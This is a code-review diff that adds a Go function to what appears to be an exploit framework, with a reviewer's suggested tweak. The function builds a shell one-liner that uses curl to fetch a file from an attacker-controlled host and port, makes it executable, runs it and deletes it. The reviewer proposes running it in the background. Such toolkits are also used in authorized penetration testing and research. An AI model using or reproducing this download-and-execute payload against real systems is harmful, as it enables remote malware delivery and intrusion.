payload/download.go

```diff
@@ -0,0 +1,13 @@
+package payload
+
+import (
+	"fmt"
+
+	"github.com/vulncheck-oss/go-exploit/random"
+)
+
+func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {
+	output := "/tmp/" + random.RandLetters(3)
+
+	return fmt.Sprintf("curl -s -o %s http://%s:%d/%s; chmod +x %s; %s; rm %s;", output, lhost, lport, downloadFile, output, output, output)
```

Comment:
```suggestion
	return fmt.Sprintf("curl -s -o %s http://%s:%d/%s; chmod +x %s; %s& rm %s;", output, lhost, lport, downloadFile, output, output, output)
```

This "usually" works. Thoughts?